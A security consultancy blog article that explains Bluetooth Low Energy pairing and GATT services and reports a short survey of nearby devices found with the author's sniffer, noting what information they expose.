Bluetooth Low Energy - Pairing, GATT and More

Bluetooth Low Energy

Pairing, GATT and More

Eleanore Young
by Eleanore Young
time to read: 6 minutes

In our last article about Bluetooth, we looked at how Bluetooth Low Energy devices advertise themselves to their surroundings. We discovered that the advertising data sometimes contains device names, vendor names, and information about services offered by the device. But we also mentioned that a large number of Bluetooth Low Energy devices can be connected to without pairing. In order to explain the significance of this statement, we first have to look at the concept of pairing and at the benefits of connecting to devices.

Pairing

Pairing is the process of establishing a mutual trust relationship between two devices. Connecting to Bluetooth devices without prior pairing is generally not possible. The Bluetooth pairing process usually requires the participants thereof to ensure that a specifically displayed number is the same on both devices. The goal here is that the device users each confirm the pairing process before it actually happens. This verification number is nowadays usually a six-digit random number, but sometimes it is also just set to 0000, depending on the vendor’s configuration of the devices.

In the background, both Bluetooth devices perform a cryptographic handshake in order to establish an encrypted communication channel between those two devices. After the pairing process, the content of the communication is not visible to others (unless they’ve recorded the handshake). For more information about Bluetooth pairing, please refer to a memo on pairing security published by the Bluetooth consortium.

Since the Bluetooth pairing process requires cryptographic algorithms, and these algorithms are often computationally expensive by design, many Bluetooth Low Energy devices are not powerful enough to perform encryption. As such, much of the communication between these devices is done in the clear, and connections can often be established without pairing.

Connecting and GATT

Upon connecting to a target Bluetooth Low Energy device, the target will provide access to a variety of Generic Attribute Profile Services (GATT). Each service is characterized by a unique identifier, a UUID, and encapsulates a number of GATT Characteristics. Each characteristic in turn is also identified by a UUID, flags such as read or write, and a byte array value. The Bluetooth consortium declared many services and characteristics, but it is also possible for vendors to specify their own. Both the Bluetooth consortium and the BlueZ repository document known services and characteristics. As an example, take the Device Information service, as defined by the Bluetooth consortium, which consists of a total of 8 characteristics, and is accessible without restrictions upon connection:

So, in the concrete example of an iPhone, the Device Information service will display two of the aforementioned characteristics: Manufacturer Name String, and Model Number String. They will Apple Inc. and the device is an iPhone8,1 (the numbers likely refer to the iOS version). But the service is missing some characteristics, and this is crucial; vendors may decide not to provide this information even though the service defines it. But, heck, they might also decide to provide all information, as is the case for a Zebra Technologies printer, which provides a model identifier ZD410, the full (!) device serial number, the firmware revision V77.19.17Z, the hardware revision ZD41022-D0EM00EZ, the software version 3.2 and a Plug-and-Play ID. This information can be an important basis for strategically preparing for attacks on these devices. Due to the fact that many characteristics are writeable, it is conceivable that even device behavior may be modified using the GATT hierarchy.

Analysis with BTLE Sniffer Software

How does this relate to the devices commonly around us? The sniffer presented in the last article about Bluetooth was updated to connect to the discovered devices and now records the GATT hierarchy for each device. Unfortunately, it cannot properly record the values of GATT characteristics yet, but this will be added in the foreseeable future. Issues and pull requests are appreciated!

The sniffer was used to record Bluetooth Low Energy devices in a rather busy area over a period of 15 minutes. From a sample of 356 discovered devices, 157 thereof had a public device name and 185 devices provided a total of 31 unique (12 known) services to others. While many of the Bluetooth Low Energy devices were infrastructure devices with unclear function, only very few were smart phones, and a large proportion of the devices were IoT devices, particularly smart watches and fitness monitors.

Devices commonly identified by their names were Alta, Fitbit, Garmin, and Microsoft smart watches, Bose and Jabra headphones, as well as Estimote iBeacon devices, Apple TV and Apple Pencil. A few devices were ostensibly named after their owners. Most devices provided three services on average. The Device Information service is present on almost all devices. Some particularly salient services were: B&O Play A/S, Heart Rate, Anhu Huami Information Technology Co., Bose Corporation, GoPro, Inc., and Kontakt Micro-Location Sp. z o.o..

With the exception of the Heart Rate service, all of the aforementioned services are vendor-defined. It remains open to speculation, what the specific purposes of these services are, as there is generally no documentation on vendor-defined services. Given what we were able to gather from the Zebra Technologies printer, it is very likely that at least some of these services provide juicy information or even control over the device of some sort.

About the Author

Eleanore Young

Eleanore Young has completed her master degree in electrical engineering and information technology in 2014 at ETH Zurich. Her areas of focus include computer architectures, operating systems and applied research.

Links

You need support in such a project?

Our experts will get in contact with you!

×
I want a "Red Teaming"

I want a "Red Teaming"

Michael Schneider

Human and AI

Human and AI

Marisa Tschopp

Vehicle forensics

Vehicle forensics

Michèle Trebo

Isn’t business continuity part of security?

Isn’t business continuity part of security?

Andrea Covello

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here